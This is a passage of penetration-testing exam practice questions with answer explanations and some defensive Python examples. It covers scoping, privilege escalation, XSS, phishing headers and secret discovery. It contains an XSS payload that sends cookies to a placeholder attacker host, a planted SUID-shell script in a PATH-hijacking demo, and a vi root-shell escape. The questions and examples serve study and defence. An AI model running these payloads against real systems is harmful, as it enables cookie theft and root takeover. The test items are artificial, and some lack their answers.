B.Request written permission from the payment processor
C.Only test the client's internal systems, excluding the API
D.Use the payment processor's sandbox environment without notifying them
AnswerB

This is the correct first step. The tester must obtain explicit permission from the third party to ensure legal and ethical testing.

Why this answer

The correct first action is to request written permission from the payment processor because the API is owned and operated by a third party, not the client. Testing a third-party API without explicit authorization could violate the Computer Fraud and Abuse Act (CFAA) and the payment processor's terms of service, potentially leading to legal liability for both the tester and the client. The scope of a penetration test must be legally defined and agreed upon by all parties whose systems are being tested.

Exam trap

The trap here is that candidates assume the client's request automatically grants legal authority to test any integrated system, overlooking the critical distinction between ownership and integration in scoping agreements.

How to eliminate wrong answers

Option A is wrong because beginning to test the API without authorization assumes the client has the legal right to grant access to a third-party system, which is a common misconception that can lead to unauthorized access and legal consequences. Option C is wrong because it ignores the client's explicit request to include the API in the test scope, failing to meet the engagement requirements and potentially leaving critical integration vulnerabilities unassessed.

562
MCQhard

A penetration tester is exploiting a Linux system that has ASLR enabled but no stack canaries. The vulnerability is a classic stack-based buffer overflow. Which of the following is the most effective method to achieve code execution?

A.Prepend a NOP sled and inject shellcode into the buffer
B.Return-to-libc (ret2libc)
C.Return to the PLT entry for system()
D.Use a ROP chain to bypass ASLR and execute shellcode
AnswerC

In a non-PIE binary the PLT (Procedure Linkage Table) stub for system() sits at a fixed address inside the executable image, which ASLR does not move, so the overwritten return address can point at it reliably.

Why this answer

Option C is correct because, with ASLR on, the stack, heap, and libc load at different addresses on each run, so neither injected shellcode nor a libc address can be targeted blindly. The executable itself, if it is not compiled as PIE, is mapped at a fixed address, and so are its PLT stubs, including the one for system() if the program imports it. Since there are no stack canaries, a plain overflow can overwrite the return address with that PLT entry. The argument must also come from a non-randomised region: a "/bin/sh" or other command string already present in the binary's .data or .rodata, since a string placed on the stack would sit at a randomised address.

Exam trap

The trap here is that candidates assume ASLR always prevents code execution, but they overlook that, for a non-PIE binary, PLT entries have fixed addresses, making ret2plt a viable bypass when no stack canaries are present. If the binary were PIE, the PLT would move with it and an address leak would be needed first.

How to eliminate wrong answers

Option A is wrong because ASLR randomizes the stack base address, making it impossible to reliably predict where the NOP sled and shellcode reside, so the overwritten return address will likely point to an invalid location. Option B is wrong because return-to-libc in the usual sense requires the runtime address of a libc function, which ASLR randomizes; the PLT entry is a better target because it lives in the fixed-address binary and resolves to system() for you. Option D is wrong because a ROP chain that defeats ASLR needs a leaked runtime address to locate gadgets in libc, which this scenario does not provide, and jumping to shellcode afterwards still assumes an executable stack; when a fixed PLT entry for system() is available, it is the simpler and more reliable route.

563
MCQmedium

Which of the following best describes the primary purpose of a 'get-out-of-jail' letter in a penetration testing engagement?

A.To provide emergency contact information
B.To outline the rules of engagement
C.To authorize the tester to bypass security controls without legal repercussions
D.To ensure the tester does not steal data
AnswerC

It serves as proof of authorization.

Why this answer

The get-out-of-jail letter provides legal authorization and protects the tester if their actions are detected as malicious.

564
MCQeasy

A tester wants to crack a password hash using a wordlist combined with rules to generate variations. Which hashcat attack mode should be used?

A.-a 0 with -r
B.-a 3
C.-a 6
D.-a 1
AnswerA

-a 0 is dictionary attack; -r applies rules.

Why this answer

Mode 0 (straight or dictionary attack) with -r applies every rule in the file to every wordlist entry. The other options are different modes: -a 1 is the combinator mode (two wordlists joined), -a 3 is mask/brute-force, and -a 6 is hybrid wordlist plus mask; none of them takes a rule file the way the question describes.

565
MCQeasy

A small business owner contacts you to perform a penetration test. The company has a single office with 50 employees, uses a cloud-based email service (Office 365), and hosts a public-facing website on a shared server. The owner is concerned about external threats but does not allow any testing that could disrupt operations. The owner wants to test the security of the website and the email system against common attacks, such as SQL injection, XSS, and phishing. Based on these constraints and the environment, which type of penetration test is most appropriate?

A.Covert red team exercise simulating a persistent attacker.
B.Full disclosure black-box test from an external perspective.
C.External gray-box test with a restricted schedule and prior notification.
D.Internal vulnerability assessment of the local network.
AnswerC

This allows focused testing with minimal disruption and aligns with client's constraints.

Why this answer

Given the owner's concern about disruption and the need to test external assets, a gray-box test (some information provided) with a schedule that avoids peak hours and with prior notification best balances effectiveness and risk. A black-box test with no schedule or notification gives the client less control over timing and impact; a red team exercise is covert and may trigger alarms and incident response; an internal assessment does not cover the external assets the owner asked about.

566
MCQmedium

During a penetration test, you are asked to identify all live hosts on a subnet. Which Nmap scan type is most likely to evade firewalls and determine if a host is up without completing the TCP handshake?

A.Ping sweep (-sn)
B.SYN scan (-sS)
C.TCP connect scan (-sT)
D.UDP scan (-sU)
AnswerB

Correct: half-open scan that doesn't complete handshake.

Why this answer

SYN scan (half-open) sends a SYN and judges the port from the SYN-ACK or RST that comes back, then tears the attempt down with a RST instead of completing the handshake. Because no full connection is made, the application never sees or logs it, which is why it is considered stealthier; a stateful firewall or IDS can still see the SYN, so "evade" here means avoiding application-level logging rather than being invisible.

567
MCQmedium

After gaining a foothold on a Windows server, a tester wants to laterally move to another machine. The tester has obtained NTLM hashes and wants to execute commands remotely. Which tool is specifically designed for remote command execution using hashes via WMI?

A.evil-winrm
B.wmiexec
C.psexec
D.CrackMapExec
AnswerB

wmiexec uses WMI and supports pass-the-hash.

Why this answer

wmiexec.py (from Impacket) allows executing commands via WMI using NTLM hashes.

568
MCQhard

A penetration tester uses Shodan to find internet-facing devices belonging to a target company. Which of the following Shodan search filters would most effectively identify devices with a specific organization name?

A.hostname:company.com
B.ssl:company.com
C.org:CompanyName
D.net:192.168.0.0/16
AnswerC

The org filter directly searches by organization name as identified by Shodan's data.

Why this answer

The 'org' filter in Shodan allows searching by organization name, which is the most direct way to find devices associated with a company.

569
MCQmedium

A penetration tester is using theHarvester to gather email addresses associated with a target domain. The tool returns several email addresses. What is the primary limitation of using theHarvester for this purpose?

A.It requires authentication to the target's mail server
B.It only searches Google
C.It only finds publicly available email addresses
D.It cannot find subdomains
AnswerC

theHarvester collects from public sources, so internal emails are not found.

Why this answer

theHarvester collects data from public sources, so its results are limited to what is publicly available. It may miss internal email addresses and can include outdated information. It does not require authentication, and it is not limited to Google only.

570
MCQmedium

A penetration tester is planning a web application test. The client wants to minimize risk to production data. Which environment should the tester recommend for testing?

A.Development environment with live data
B.Production environment with a read-only database
C.Staging environment with anonymized data
D.Production environment with full access
AnswerC

Correct. Staging with anonymized data minimizes risk.

Why this answer

Testing in a staging environment reduces the risk of impacting live data and systems.

571
MCQeasy

A penetration testing firm is scoping a test for a client that has a hybrid infrastructure with on-premises servers and cloud-based virtual machines. The client insists on testing only the on-premises systems due to budget constraints. Which of the following should the penetration tester emphasize during the scoping discussion?

A.The on-premises systems are more critical, so testing them is sufficient.
B.Cloud systems are generally more secure and do not require testing.
C.Limiting the scope to on-premises may result in an incomplete risk picture because cloud systems are part of the attack surface.
D.Testing cloud systems would violate the shared responsibility model.
AnswerC

Both on-premises and cloud systems contribute to the overall attack surface; excluding one may leave critical vulnerabilities undetected.

Why this answer

Option C is correct because the client's hybrid infrastructure means that cloud-based virtual machines are part of the overall attack surface, and limiting the scope to on-premises systems ignores potential attack vectors such as misconfigured cloud APIs, insecure inter-VPC routing, or compromised cloud credentials that could lead to lateral movement into on-premises systems. A penetration test must assess all components that can be exploited to provide a complete risk picture, as cloud systems often serve as entry points or pivot points into the on-premises environment.

Exam trap

The trap here is that candidates may assume budget constraints justify limiting scope to on-premises, but the exam tests the principle that a penetration test must cover the entire attack surface to be valid, and cloud systems are a critical part of that surface in hybrid architectures.

How to eliminate wrong answers

Option A is wrong because it assumes on-premises systems are inherently more critical, which is a subjective and unsupported claim; in a hybrid infrastructure, cloud systems may host sensitive data or applications and can be the initial breach vector, so excluding them leaves critical risks unassessed. Option B is wrong because it incorrectly states that cloud systems are generally more secure and do not require testing; in reality, cloud systems are subject to misconfigurations (e.g., open S3 buckets, overly permissive IAM roles) and shared responsibility model gaps that require dedicated security testing.

572
MCQhard

A penetration tester is assessing a web application and wants to identify hidden parameters that the application accepts. Which tool is specifically designed for parameter discovery?

A.WPScan
B.Arjun
C.Nikto
D.Gobuster
AnswerB

Arjun is designed to find hidden GET and POST parameters by fuzzing and analyzing responses.

Why this answer

Arjun is a tool for discovering HTTP parameters by brute-forcing common parameter names and analyzing responses for changes, making it suitable for parameter discovery.

573
MCQeasy

A penetration tester is conducting passive reconnaissance and wants to find historical snapshots of a target website to identify past vulnerabilities or hidden endpoints. Which online service should the tester use?

A.Shodan
B.Censys
C.Wayback Machine
D.Pastebin
AnswerC

Correct. It provides historical website snapshots.

Why this answer

The Wayback Machine (archive.org) is the correct choice because it archives historical snapshots of websites, allowing a penetration tester to review past versions of a target site to identify previously exposed vulnerabilities, hidden endpoints, or outdated configurations. This aligns with passive reconnaissance, as the tester does not interact directly with the live target.

Exam trap

The trap here is that candidates may confuse passive reconnaissance tools like Shodan or Censys (which focus on live infrastructure) with the Wayback Machine, which is specifically designed for historical web content retrieval.

How to eliminate wrong answers

Option A is wrong because Shodan is a search engine for internet-connected devices and services (e.g., open ports, banners), not for historical website snapshots. Option B is wrong because Censys is a platform for discovering and analyzing internet-connected hosts and certificates, not for retrieving archived web pages. Option D is wrong because Pastebin is a text-sharing service often used for leaked data or code snippets, not for storing historical snapshots of entire websites.

574
Multi-Selectmedium

A penetration tester has obtained a set of NTLM hashes from a Windows domain. The tester wants to perform lateral movement to other systems. Which TWO tools can be used for this purpose? (Select TWO.)

Select 2 answers
A.pth-winexe
B.CrackMapExec
C.Responder
D.Nmap
E.Hashcat
AnswersA, B

pth-winexe executes commands on remote Windows systems using pass-the-hash.

Why this answer

CrackMapExec and pth-winexe both support pass-the-hash for lateral movement.

575
Drag & Dropmedium

Drag and drop the steps to perform a man-in-the-middle (MITM) attack using ARP spoofing with Bettercap into the correct order.

Why this order

ARP spoofing MITM requires enabling IP forwarding first (so victim traffic is relayed rather than dropped), then spoofing both the target and the gateway so both directions pass through the attacker, and only then capturing traffic. In Bettercap that maps to setting arp.spoof.targets, enabling arp.spoof.fullduplex, running arp.spoof on, and then net.sniff on.

576
MCQeasy

A penetration tester needs to describe a stored XSS vulnerability to a web developer who will fix it. Which level of detail is most appropriate for this audience?

A.Provide the CVSS score and risk rating.
B.Describe the business impact and potential regulatory fines.
C.Include the specific vulnerable URL, the request parameters, the payload used, and a code snippet for proper output encoding.
D.Use a graph showing the number of vulnerabilities by severity across the application.
AnswerC

This level of detail gives the developer everything needed to reproduce the vulnerability and apply the correct fix. It is precise and actionable.

Why this answer

Option C is correct because a web developer needs precise, actionable technical details to remediate the vulnerability: the exact URL, request parameters, the payload that triggered the stored XSS, and a code snippet showing proper output encoding (e.g., the OWASP Java Encoder or the framework's own context-aware escaping, chosen for the HTML, attribute, or JavaScript context the data lands in). This level of detail enables the developer to locate the vulnerable code, understand the injection point, and apply the correct fix without ambiguity.

Exam trap

The trap here is that candidates confuse the audience's needs: they may pick business impact (Option B) for a developer, but developers require technical details (Option C) to actually fix the code, not just awareness of consequences.

How to eliminate wrong answers

Option A is wrong because a CVSS score and risk rating provide a severity metric but no technical specifics about the vulnerable endpoint, input vector, or remediation steps, which a developer needs to fix the code. Option B is wrong because describing business impact and regulatory fines addresses management concerns but omits the technical details (e.g., the vulnerable parameter, payload, or encoding fix) required for a developer to remediate the stored XSS vulnerability.
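The kind of "vulnerable beside fixed" snippet a developer-facing finding would carry, as an added example that is not part of the original question set. The stored comments and payloads are constructed; the point is that the attribute context needs the quote encoded as well as the angle brackets, which is why the element context and the attribute context are shown separately.

```python
import html

# Constructed stored comments: one benign, one element-context payload, one attribute-context payload.
STORED_COMMENTS = [
    "Great write-up, thanks.",
    '<script>fetch("https://attacker.invalid/c?"+document.cookie)</script>',
    '" onmouseover="alert(document.domain)',
]


def render_vulnerable(comments: list) -> str:
    """Vulnerable: stored text concatenated straight into an attribute and into the element body."""
    return "".join(f'<li title="{c}">{c}</li>' for c in comments)


def render_encoded(comments: list) -> str:
    """Fixed: encode for the context. Text nodes need < > &; attribute values also need the quotes."""
    return "".join(
        f'<li title="{html.escape(c, quote=True)}">{html.escape(c, quote=True)}</li>'
        for c in comments
    )


def has_script_tag(rendered: str) -> bool:
    """True if a raw <script> element survived into the output (element-context XSS)."""
    return "<script" in rendered.lower()


def breaks_out_of_attribute(rendered: str) -> bool:
    """True if a raw quote closed the title attribute and an event handler followed (attribute-context XSS)."""
    return '" onmouseover="' in rendered
```

render_vulnerable() emits both payloads live; render_encoded() turns them into &lt;script&gt; and &quot; onmouseover=&quot;, inert text in both contexts. In a report the finding would pair this with the vulnerable URL and parameter name so the developer can reproduce it before applying the fix.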

577
MCQhard

A penetration tester has gained a low-privileged shell on a Linux server and discovers a binary with the SUID bit set owned by root. The binary executes a system command using a relative path without sanitizing user input. Which of the following techniques would the tester MOST likely use to escalate privileges?

A.Exploit a kernel vulnerability to gain root
B.Modify the PATH environment variable to point to a malicious script with the same name as the command called by the binary
C.Impersonate the root user using sudo
D.Preload a shared library using LD_PRELOAD
AnswerB

PATH hijacking leverages the SUID binary's use of a relative path; by placing a malicious executable earlier in PATH, the binary executes it with root privileges.

Why this answer

Option B is correct because the SUID binary executes a system command using a relative path without sanitizing user input. By modifying the PATH environment variable to include a directory containing a malicious script with the same name as the command, the tester can cause the binary to execute the attacker-controlled script instead of the intended system command, thereby escalating privileges to root when the SUID binary runs.

Exam trap

The trap here is that candidates may think kernel exploitation (Option A) is always the go-to for privilege escalation, but the question specifically describes a misconfigured SUID binary with a relative path and unsanitized input, making PATH hijacking the most direct and likely technique.

How to eliminate wrong answers

Option A is wrong because exploiting a kernel vulnerability is a different technique that does not leverage the specific misconfiguration of the SUID binary with a relative path and unsanitized input; it would be the fallback if no such binary existed and a usable kernel exploit were available, but the question explicitly describes a binary that can be exploited via PATH hijacking. Option C is wrong because impersonating the root user using sudo requires the tester to already have sudo rights or know the root password, which is not the case here; the tester has a low-privileged shell and cannot simply use sudo without proper authorization. Option D is wrong because the dynamic loader ignores LD_PRELOAD for set-user-ID executables (secure-execution mode), so preloading a library does not work against a SUID binary, whereas PATH is inherited and honoured by the relative-path command lookup.
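The lookup that makes PATH hijacking work, as an added example that is not part of the original question set. shutil.which() performs the same left-to-right search over PATH that execvp() and the shell perform for a relative command name. The directories, the fake `service` binaries and the PATH value are constructed inside temporary directories; the planted script is only resolved, never executed, and the privileged behaviour described in its comment is what it would do if a SUID caller ran it.

```python
import os
import shutil
import stat
import tempfile


def write_executable(path: str, body: str) -> str:
    """Write a script and mark it executable so PATH lookup will consider it."""
    with open(path, "w") as fh:
        fh.write(body)
    os.chmod(path, os.stat(path).st_mode | stat.S_IXUSR | stat.S_IXGRP | stat.S_IXOTH)
    return path


def resolve_command(command: str, path_env: str):
    """Same lookup execvp()/the shell performs: first matching executable in PATH, left to right.
    A command containing a slash is taken as given and PATH is not consulted."""
    return shutil.which(command, path=path_env)


def demo() -> dict:
    """Lay out a fake system dir with the real `service`, an attacker dir with a fake one, and compare lookups."""
    with tempfile.TemporaryDirectory() as sysdir, tempfile.TemporaryDirectory() as evil:
        real = write_executable(os.path.join(sysdir, "service"), "#!/bin/sh\necho real service\n")
        fake = write_executable(
            os.path.join(evil, "service"),
            "#!/bin/sh\n"
            "# attacker-controlled: would run as root when a SUID caller does system(\"service ...\")\n"
            "cp /bin/sh /tmp/rootsh && chmod u+s /tmp/rootsh\n",
        )
        # What the attacker exports (PATH=/tmp/evil:$PATH) before running the SUID binary.
        hijacked_path = f"{evil}{os.pathsep}{sysdir}"
        return {
            # The vulnerable binary calls "service" by name: the attacker's copy wins.
            "relative_lookup_hijacked": resolve_command("service", hijacked_path) == fake,
            # Fix 1: call the command by absolute path; PATH is never consulted.
            "absolute_path_safe": resolve_command(real, hijacked_path) == real,
            # Fix 2: reset PATH to a trusted value before any exec.
            "sanitised_path_safe": resolve_command("service", sysdir) == real,
        }
```

Note that sudo resets PATH to its configured secure_path for the commands it runs, which is why this trick targets SUID binaries executed directly: they inherit the caller's environment unchanged.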

578
MCQmedium

A penetration tester gains a low-privilege shell on a Linux server. Using 'sudo -l', the tester finds that they can run '/usr/bin/vi' as root without a password. Which technique would the tester MOST likely use to escalate privileges?

A.Exploit a kernel vulnerability
B.Use vi to execute a shell as root
C.Modify a cron script
D.Perform PATH hijacking
AnswerB

vi can spawn a shell via ':!/bin/bash' when run with sudo.

Why this answer

GTFOBins lists vi as having a sudo escape, allowing privilege escalation by spawning a root shell. Other options are not directly applicable.

579
MCQeasy

A client requests a penetration test but only provides network diagrams and application credentials. Which type of test is being scoped?

A.Red team
B.Black box
C.Grey box
D.White box
AnswerC

Grey box testing involves limited information sharing, such as network diagrams and credentials.

Why this answer

A grey box test provides the tester with limited information such as network diagrams and credentials, which matches the scenario. Black box tests provide no information, white box tests provide full information, and red team engagements are a type of test, not a box color.

580
MCQhard

During a penetration test, you find a web application that uses JavaScript to make API calls. You want to discover hidden API endpoints and potential secrets (e.g., API keys) embedded in the client-side code. Which approach is most appropriate?

A.Download and analyze the JavaScript files
B.Perform a DNS zone transfer
C.Run a Nikto scan against the application
D.Use theHarvester to search for API endpoints
AnswerA

JavaScript analysis can reveal endpoints and secrets hardcoded in the code.

Why this answer

Option A is correct because JavaScript files in client-side web applications often contain hardcoded API endpoints, API keys, and other secrets that developers inadvertently leave in the source code. By downloading and analyzing these files (e.g., via browser developer tools or wget), you can discover hidden endpoints and sensitive tokens that are not exposed in the HTML or network traffic alone.

Exam trap

The trap here is that candidates may confuse information gathering techniques (e.g., DNS zone transfer or OSINT) with client-side code analysis, assuming that API endpoints must be found through network scanning rather than by examining the application's own source code.

How to eliminate wrong answers

Option B is wrong because DNS zone transfer is a network-level technique used to enumerate DNS records (e.g., subdomains) from a DNS server, not to extract API endpoints or secrets from client-side code. Option C is wrong because Nikto is a web server vulnerability scanner that checks for known vulnerabilities and misconfigurations, but it does not parse JavaScript files to find hidden API endpoints or embedded secrets. Option D is wrong because theHarvester is an OSINT tool designed to gather emails, subdomains, and other public information from search engines and PGP servers, not to analyze client-side JavaScript for API endpoints or secrets.
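A first-pass extractor for a downloaded bundle, as an added example that is not part of the original question set. SAMPLE_JS is a constructed excerpt standing in for a fetched app.js (the hostnames, key and token values are made up; the AWS key is the documented example key format). The patterns are deliberately simple: path-like string literals and absolute URLs for endpoints, two high-confidence token formats plus a keyword heuristic for secrets, with deduplication so a value matched by two patterns is reported once.

```python
import re

# Constructed bundle excerpt standing in for a downloaded app.js; names and values are made up.
SAMPLE_JS = r'''
const API_BASE = "https://api.example.com/v2";
const JWT_SECRET = "s3cr3t-signing-key-2024";
const routes = { users: API_BASE + "/users", export: "/internal/admin/export" };
fetch("/api/v1/orders?status=open", { headers: { "X-Api-Key": "AKIAIOSFODNN7EXAMPLE" } });
var ghToken = "ghp_aBcDeFgHiJkLmNoPqRsTuVwXyZ0123456789";
axios.post('/graphql', query);
'''

# A quoted string literal that starts with "/" and looks like a path (also catches /users/:id and /x/{id}).
RELATIVE_ENDPOINT = re.compile(r"""["'`](/[A-Za-z0-9_\-./?=&:{}]+)["'`]""")
ABSOLUTE_URL = re.compile(r"""https?://[A-Za-z0-9_\-./?=&:]+""")

# Ordered: specific, high-confidence formats first, the keyword heuristic last.
SECRET_PATTERNS = [
    ("aws_access_key_id", re.compile(r"\bAKIA[0-9A-Z]{16}\b")),
    ("github_token", re.compile(r"\bghp_[A-Za-z0-9]{36}\b")),
    ("keyword_match", re.compile(
        r"""(?i)(api[_-]?key|secret|token)\b["']?\s*[:=]\s*["']([^"'\s]{8,})["']""")),
]


def find_endpoints(js: str) -> list:
    """Sorted, de-duplicated list of relative paths and absolute URLs found in string literals."""
    found = set(RELATIVE_ENDPOINT.findall(js)) | set(ABSOLUTE_URL.findall(js))
    return sorted(found)


def find_secrets(js: str) -> list:
    """(kind, value) pairs; a value matched by more than one pattern is reported once, under the first."""
    hits, seen = [], set()
    for kind, pattern in SECRET_PATTERNS:
        for m in pattern.finditer(js):
            value = m.group(m.lastindex or 0)   # last capture group holds the value, else the whole match
            if value not in seen:
                seen.add(value)
                hits.append((kind, value))
    return hits
```

On the sample this yields five endpoints, including the /internal/admin/export route that no crawl of the rendered pages would reveal, and three credentials. In practice every hit is a lead to verify, not a finding: the next step is to request the endpoints (in scope) and confirm whether the keys are live.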

581
MCQhard

A tester decompiles a .NET application using dnSpy and finds a function that loads a serialized object from a file. Which vulnerability is most likely present?

A.Path traversal
B.SQL injection
C.Hardcoded credentials
D.Insecure deserialization
AnswerD

Deserializing untrusted data can lead to code execution.

Why this answer

The function loads a serialized object from a file, which is a classic indicator of insecure deserialization. In .NET, deserializing untrusted data without validation (for example with BinaryFormatter, which Microsoft now marks obsolete for exactly this reason) can allow an attacker to execute arbitrary code or manipulate application logic, as the runtime reconstructs objects, and runs their constructors and callbacks, from the serialized stream. dnSpy decompilation revealing this pattern directly points to the risk of insecure deserialization.

Exam trap

CompTIA often tests the distinction between the action (loading a file) and the vulnerability (insecure deserialization), leading candidates to mistakenly choose path traversal because the file is loaded from disk, ignoring the core risk of deserializing untrusted objects.

How to eliminate wrong answers

Option A is wrong because path traversal involves manipulating file paths to access unauthorized directories, not the deserialization of objects from a file. Option B is wrong because SQL injection targets database queries through input injection, not the loading of serialized objects. Option C is wrong because hardcoded credentials refer to embedded usernames or passwords in source code, which is unrelated to the deserialization process.

582
MCQmedium

While exploiting a Windows machine, a tester gains a shell with limited privileges. They attempt to escalate privileges using a tool that exploits the SeImpersonatePrivilege. Which tool is specifically designed for this purpose on modern Windows versions?

A.Mimikatz
B.JuicyPotato
C.PrintSpoofer
D.PowerUp
AnswerC

PrintSpoofer abuses the Print Spooler service's named-pipe behaviour to obtain a SYSTEM token that a process holding SeImpersonatePrivilege can impersonate; it works on Windows 10 and Server 2016/2019 builds where JuicyPotato no longer does.

Why this answer

SeImpersonatePrivilege lets a process impersonate the security context of clients that connect to it. PrintSpoofer coerces the Print Spooler (which runs as SYSTEM) into connecting to a named pipe the low-privilege process controls, impersonates the resulting token, and spawns a SYSTEM shell. The privilege is normally held by service accounts such as IIS application pools and SQL Server, so this path is common after a web or database compromise; confirm the privilege is present with whoami /priv before reaching for the tool.

583
MCQhard

A penetration tester has gained a low-privilege shell on a Windows server and discovered that the SeImpersonatePrivilege is enabled. Which of the following tools would be most appropriate to escalate privileges to SYSTEM-level access?

A.pth-winexe
B.PrintSpoofer
C.Responder
D.CrackMapExec
AnswerB

PrintSpoofer leverages SeImpersonatePrivilege to spawn a SYSTEM shell.

Why this answer

SeImpersonatePrivilege allows token impersonation, and PrintSpoofer abuses it to gain SYSTEM. JuicyPotato and the other Potato variants rely on the same privilege but depend on DCOM activation behaviour that Microsoft changed in Windows 10 1809 and Server 2019, so PrintSpoofer is the more reliable choice on current builds. pth-winexe, Responder and CrackMapExec are lateral-movement and credential-capture tools, not local privilege-escalation tools.

584
MCQmedium

The client's development team needs to reproduce a cross-site scripting (XSS) vulnerability discovered during the penetration test. They require the exact payload and step-by-step instructions. Which deliverable should the tester provide to meet this need?

A.Executive Summary
B.Detailed Vulnerability Report with reproduction steps
C.Rules of Engagement
D.Risk Assessment Matrix
AnswerB

This deliverable provides the technical depth required by the development team to understand and fix the vulnerability.

Why this answer

The correct answer is B because the development team needs the exact payload and step-by-step instructions to reproduce the XSS vulnerability. A Detailed Vulnerability Report with reproduction steps provides the precise technical details, including the payload string, input vectors, and browser behavior, enabling the team to replicate the issue in their environment. This aligns with the PT0-002 objective of delivering actionable findings for remediation.

Exam trap

The trap here is that candidates may confuse the Executive Summary (Option A) with a deliverable that contains technical details, but the exam expects you to know that reproduction steps belong in the detailed vulnerability report, not in a summary document.

How to eliminate wrong answers

Option A is wrong because an Executive Summary is a high-level overview for management, lacking the specific payload and step-by-step reproduction instructions needed by the development team. Option C is wrong because the Rules of Engagement define the scope, authorization, and constraints of the penetration test, not the technical details of a discovered vulnerability.

585
Multi-Selecthard

During an active reconnaissance phase, a penetration tester runs Nmap against a target and obtains the following results: Host is up, ports 22, 80, and 443 are open. The tester then runs an unauthenticated (uncredentialed) Nessus scan. Which THREE of the following issues should the tester be most concerned about regarding the accuracy and completeness of the Nessus scan results?

Select 3 answers
A.The Nmap results may have false positives for open ports
B.Nessus will only scan the top 1000 ports by default, potentially missing services on higher ports
C.Nessus might miss vulnerabilities that require authenticated access to detect
D.The vulnerability scan might not detect vulnerabilities in services not identified by Nmap
E.Nessus may produce false positives due to banner grabbing and version detection errors
AnswersC, D, E

Unauthenticated scans cannot check configuration issues or patch levels that require credentials.

Why this answer

An unauthenticated scan can only judge a host from what is visible on the network. It infers vulnerabilities from banners and version strings (a false positive whenever a backported patch leaves the version number unchanged), and it cannot see missing patches, weak local configuration, or software that exposes no network service at all. Nmap's open-port results are generally reliable, so option A is not the main concern; ports a firewall blocks show up as filtered rather than as spurious opens.

586
MCQmedium

A penetration tester is performing a social engineering campaign against a client. The tester wants to send a phishing email that bypasses the email security gateway and appears to come from an internal source. Which technique is most effective?

A.Set the Reply-To address to an attacker-controlled email
B.Insert a custom email header that mimics internal mail
C.Use a URL shortener to hide the malicious link
D.Register a similar domain and spoof the display name
AnswerA

Sender authentication covers the envelope sender and the From header; Reply-To is never authenticated, so the message passes and every reply is routed to the attacker.

Why this answer

Setting the Reply-To address to an attacker-controlled mailbox works because SPF, DKIM and DMARC authenticate the SMTP envelope sender (Return-Path) and the From header domain; none of them examine Reply-To. A message whose sending domain passes those checks, or that targets a domain without an enforced DMARC policy, is delivered, appears to come from an internal sender, and silently routes every reply to the attacker. Caveat for the report: if the client's domain publishes an enforcing DMARC policy (p=quarantine or p=reject), a From header spoofed to that domain is rejected regardless of Reply-To, so the technique depends on missing or lax DMARC enforcement, which is itself a finding worth documenting.

Exam trap

The trap is treating Reply-To as equivalent to spoofing the sender. The gateway's authentication checks focus on the From header and the envelope sender, not on Reply-To, which is why a mismatched Reply-To slips through automated checks that a forged From domain would fail.

How to eliminate wrong answers

Option B is wrong because inserting a custom email header that mimics internal mail does not bypass SPF/DKIM/DMARC validation; the ESG still checks the SMTP envelope sender and the From header against DNS records, so the email will likely be rejected or flagged. Option C is wrong because using a URL shortener hides the malicious link but does not address the ESG's authentication checks on the sender domain; the email still fails SPF/DKIM/DMARC if the From domain is spoofed, and many ESGs now block or sandbox shortened URLs. Option D is wrong because registering a similar domain and spoofing the display name only bypasses human inspection, not the ESG's automated checks; the ESG will still validate the actual domain in the From header against SPF/DKIM/DMARC records, and the similar domain will fail unless it is also configured with proper authentication records.
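The gap described above, turned into the check a gateway or SOC analyst would run, as an added example (not part of the question bank). It parses a constructed phishing message with only the standard library, compares the Reply-To domain with the From domain, and reads the Authentication-Results stamp a receiving gateway adds; the addresses, domains and header text are invented for the example.

```python
from email import policy
from email.parser import BytesParser
from email.utils import parseaddr

# Constructed sample messages. Authentication-Results is the header a
# receiving gateway stamps on arrival; the domains are invented.
SAMPLE_PHISH = b"""Return-Path: <bounce@bulk-mailer.example>
Authentication-Results: mx.corp.example;
 spf=pass smtp.mailfrom=bulk-mailer.example;
 dkim=none;
 dmarc=none header.from=corp.example
From: "IT Helpdesk" <helpdesk@corp.example>
Reply-To: helpdesk@corp-example-support.net
To: alice@corp.example
Subject: Password expiry notice

Your password expires today. Reply with your current password to keep access.
"""

SAMPLE_LEGIT = b"""Return-Path: <helpdesk@corp.example>
Authentication-Results: mx.corp.example;
 spf=pass smtp.mailfrom=corp.example;
 dkim=pass header.d=corp.example;
 dmarc=pass header.from=corp.example
From: "IT Helpdesk" <helpdesk@corp.example>
To: alice@corp.example
Subject: Maintenance window

The VPN will be unavailable on Saturday between 02:00 and 04:00.
"""


def domain_of(header_value) -> str:
    """Lower-cased domain of the first address in a header, or '' if absent."""
    addr = parseaddr(str(header_value or ""))[1]
    return addr.rpartition("@")[2].lower()


def analyse(raw: bytes) -> dict:
    """Flag a Reply-To that diverges from From, and a From domain that did not pass DMARC."""
    msg = BytesParser(policy=policy.default).parsebytes(raw)
    from_domain = domain_of(msg.get("From"))
    # No Reply-To means replies go to From, so treat that as matching.
    reply_domain = domain_of(msg.get("Reply-To")) or from_domain
    auth = str(msg.get("Authentication-Results") or "").lower()
    dmarc_pass = "dmarc=pass" in auth

    findings = []
    if reply_domain != from_domain:
        findings.append(f"Reply-To domain {reply_domain} differs from From domain {from_domain}")
    if not dmarc_pass:
        findings.append(f"From domain {from_domain} was not DMARC-authenticated")
    return {
        "from_domain": from_domain,
        "reply_domain": reply_domain,
        "dmarc_pass": dmarc_pass,
        "findings": findings,
        "suspicious": bool(findings),
    }
```

The second finding is the one that decides whether the attack was even possible: a DMARC pass on the internal domain means the From header was genuinely authenticated, while dmarc=none means the organisation publishes no enforcing policy and a forged internal From header is accepted.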

587
Multi-Selectmedium

A penetration tester is conducting an internal network assessment. The tester wants to perform a man-in-the-middle attack to capture credentials. Which TWO tools can be used for ARP spoofing?

Select 2 answers
A.Ettercap
B.Responder
C.Nmap
D.Bettercap
E.Hashcat
AnswersA, D

Ettercap is a classic ARP spoofing tool.

Why this answer

Bettercap and Ettercap both implement ARP spoofing and the on-path capture modules that go with it. Responder captures credentials by poisoning LLMNR, NBT-NS and mDNS name resolution, not ARP; Nmap is a scanner and Hashcat an offline password cracker.

588
MCQhard

Refer to the exhibit. A penetration tester is presenting this finding to a non-technical executive. Which improvement should be made to the description?

A.Include the CVSS vector
B.List the exact database tables affected
C.Add a proof-of-concept screenshot
D.Describe the business impact in plain language
AnswerD

Translating technical impact into business terms (e.g., financial, reputational risk) is essential for executive communication.

Why this answer

Describing the business impact in plain language helps executives understand the risk without technical jargon.

589
MCQhard

A client wants a penetration test that includes testing of their internal network, external perimeter, and wireless. However, they have a very limited budget. Which approach would best meet the client's needs while staying within budget?

A.Use vulnerability scanners for all three areas
B.Conduct a targeted test focusing on high-risk areas identified through threat modeling
C.Only test internal and external
D.Only test external and wireless
AnswerB

